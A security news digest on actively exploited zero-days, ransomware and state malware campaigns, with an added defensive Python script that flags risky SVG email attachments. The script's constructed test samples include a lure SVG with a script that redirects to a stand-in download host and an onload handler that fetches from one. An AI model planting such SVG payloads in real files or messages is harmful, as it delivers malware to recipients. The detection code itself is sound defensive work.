Today’s intelligence digest is dominated by actively exploited zero-day vulnerabilities in enterprise software. A critical CVSS 10.0 flaw in Fortra’s GoAnywhere MFT is being exploited in the wild, alongside separate zero-days in Cisco ASA firewalls that the ArcaneDoor threat actor is exploiting. We are also tracking a new, more capable variant of the LockBit ransomware and a campaign by Iranian state actors that signs malware with valid code-signing certificates issued by SSL.com.
Top 5 Critical Security Alerts
- Maximum severity GoAnywhere MFT flaw exploited as zero-day: A critical CVSS 10.0 vulnerability in Fortra’s GoAnywhere MFT is being actively exploited as a zero-day, with evidence suggesting exploitation began a week before public disclosure.
- Cisco ASA Firewall Zero-Day Exploits Deploy New Malware: The ArcaneDoor threat actor is exploiting zero-day vulnerabilities in Cisco ASA firewalls to deploy two new malware strains, RayInitiator and LINE VIPER, prompting urgent patch advisories from US and UK agencies.
- New LockBit Ransomware Variant Emerges as Most Dangerous Yet: A new version of the LockBit ransomware has been identified with significant technical improvements and cross-platform capabilities, targeting Windows, Linux, and VMware ESXi systems.
- Iranian State Hackers Use SSL.com Certificates to Sign Malware: Multiple Iranian state-sponsored threat groups, including Charming Kitten, are using valid code-signing certificates issued by SSL.com to sign and distribute malware, so that it passes security controls that treat a valid signature as a mark of trust.
- Ransomware attack on Ohio county impacts over 45,000 residents: A ransomware attack on an Ohio county has resulted in a significant data breach, exposing the names, Social Security numbers, and financial information of over 45,000 people.
Threat Intelligence
- New COLDRIVER Malware Campaign Targets Russia-Focused Entities: The Russian APT group COLDRIVER is using two new malware families, BAITSWITCH and SIMPLEFIX, in a multi-stage campaign against Russia-focused targets.
- New macOS XCSSET Variant Targets Firefox with Clipper and Persistence Module: An updated version of the XCSSET macOS malware has been discovered with enhanced capabilities for browser targeting (now including Firefox), clipboard hijacking, and establishing persistence.
- HeartCrypt Packer-as-a-Service Operation Expands Impersonation Efforts: Security researchers have detailed the evolution of HeartCrypt, a widely used packer-as-a-service that threat actors pay for to obfuscate malware, including its expanded impersonation efforts.
- Phishing Campaign Uses Malicious SVG Files to Target Ukraine and Vietnam: A phishing campaign impersonating Ukrainian government agencies is using malicious SVG files to deliver CountLoader, which in turn drops Amatera Stealer and PureMiner malware.
- Teens Arrested in Netherlands on Suspicion of Spying for Russia: Two teenagers have been arrested by Dutch police, reportedly on suspicion of conducting cyber-espionage activities on behalf of pro-Russian hacking groups.
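The SVG lure in the Ukraine and Vietnam campaign above is worth a cheap gateway-side check, because many mail filters pass SVG through as an image even though it is XML that can carry script, event handlers, embedded HTML and external links. The following Python script is an added example, not code from this digest or from the researchers it cites; the sample SVGs and the example.invalid hostname are constructed for the example, and since the page does not describe what the real lures contain, the checks are generic SVG-attachment triage rather than a signature for CountLoader.

```python
"""Static triage of SVG attachments: flag script-bearing or redirecting SVGs.

Added example (stdlib only). Sample inputs below are constructed; the real
lures from the campaign are not reproduced here.
"""
import re
import xml.etree.ElementTree as ET

MAX_BYTES = 2 * 1024 * 1024                               # refuse oversized input
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)      # onload, onclick, onbegin ...
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")        # long base64 run in text nodes


def _local(name: str) -> str:
    """Strip an XML namespace prefix: '{ns}href' -> 'href'."""
    return name.rsplit("}", 1)[-1]


def triage_svg(data: bytes) -> dict:
    """Return {'verdict': 'clean' | 'suspicious', 'findings': [...]} for one SVG."""
    findings = []
    if len(data) > MAX_BYTES:
        return {"verdict": "suspicious", "findings": ["oversized input"]}
    try:
        # expat does not fetch external entities; keep the size cap above and
        # prefer defusedxml in production for entity-expansion protection.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return {"verdict": "suspicious", "findings": [f"unparseable XML: {exc}"]}
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append("<script> element")
        elif tag == "foreignObject":
            findings.append("<foreignObject> element (embedded HTML)")
        elif tag in ("iframe", "embed", "object"):
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            v = value.strip().lower()
            if EVENT_ATTR.match(aname):
                findings.append(f"event handler {aname} on <{tag}>")
            elif aname == "href" and v.startswith("javascript:"):
                findings.append(f"{aname}={value[:40]!r} on <{tag}>")
            elif aname == "href" and v.startswith("data:") and not v.startswith("data:image/"):
                # data:image/... is how benign SVGs embed raster images; anything
                # else (data:text/html, data:application/...) is a lure pattern.
                findings.append(f"non-image data: URI on <{tag}>")
            elif aname == "href" and v.startswith(("http://", "https://")):
                findings.append(f"external href on <{tag}>: {value}")
        if el.text and B64_BLOB.search(el.text):
            findings.append(f"long base64 blob inside <{tag}>")
    return {"verdict": "suspicious" if findings else "clean", "findings": findings}


# Constructed samples (not real campaign artifacts).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <rect x="10" y="10" width="80" height="80" fill="#3366cc"/>
</svg>"""

LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <text x="10" y="20">Document is loading...</text>
  <script type="text/javascript"><![CDATA[
    window.location = "https://example.invalid/download";
  ]]></script>
  <a xlink:href="javascript:void(0)"><text x="10" y="40">Open</text></a>
</svg>"""

HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://example.invalid/b')">
  <circle r="5"/>
</svg>"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("lure", LURE_SVG), ("handler", HANDLER_SVG)):
        result = triage_svg(sample)
        print(f"{label}: {result['verdict']}")
        for finding in result["findings"]:
            print(f"  - {finding}")
```

The verdict is deliberately binary: an SVG attachment that needs a script, an event handler or a `javascript:` link to render is not something a mail gateway should deliver inline, so any finding is enough to quarantine for analyst review rather than to score.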
Security Breaches & Incidents
- Volvo Employee SSNs Stolen in Supplier Ransomware Attack: Volvo North America has confirmed that employee Social Security numbers were stolen in a ransomware attack on one of its IT suppliers.
- Thousands of Indian bank transfer records found spilling online after security lapse: A configuration error at Indian fintech company NuPay exposed thousands of sensitive bank transfer records online; the data has since been secured.
Security Tools & Best Practices
- Microsoft Edge to block malicious sideloaded extensions: Microsoft is introducing a new security feature in its Edge browser that blocks potentially malicious extensions installed by sideloading rather than from the store.
- Microsoft shares temp fix for Outlook encrypted email errors: Microsoft is investigating an issue that causes errors when opening encrypted emails from external organizations in Outlook and has provided a temporary workaround.
- TruSources to showcase on-device identity-checking technology: A startup named TruSources is developing privacy-focused technology that performs age and identity verification directly on a user’s device without uploading ID documents.
Emerging Security Technologies
- The hidden cyber risks of deploying generative AI: Deploying generative AI without proper safeguards can introduce significant security risks, including new avenues for phishing, fraud, and model manipulation.
- US investigators are using AI to detect child abuse images made by AI: The Department of Homeland Security is experimenting with AI tools to distinguish AI-generated child abuse material from images depicting real victims.
